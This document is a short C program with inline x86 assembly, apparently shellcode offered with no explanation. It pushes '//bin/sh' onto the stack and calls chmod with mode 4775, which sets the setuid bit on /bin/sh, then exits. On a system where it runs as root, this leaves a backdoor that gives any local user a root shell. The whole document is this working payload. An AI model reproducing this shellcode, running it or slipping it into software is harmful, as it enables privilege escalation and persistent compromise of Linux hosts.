void main(){
__asm__("
        xor    %eax,%eax    
        xor    %ebx,%ebx    
        xor    %ecx,%ecx    
        pushl  %ebx          #push ebx
        pushl  $0x68732f6e   #push //bin/sh
        pushl  $0x69622f2f
        movl   %esp, %ebx
        movw   $0x9fd, %cx
        mov    $0xf, %al
        int    $0x80

        mov $0x1, %al
        int $0x80

");}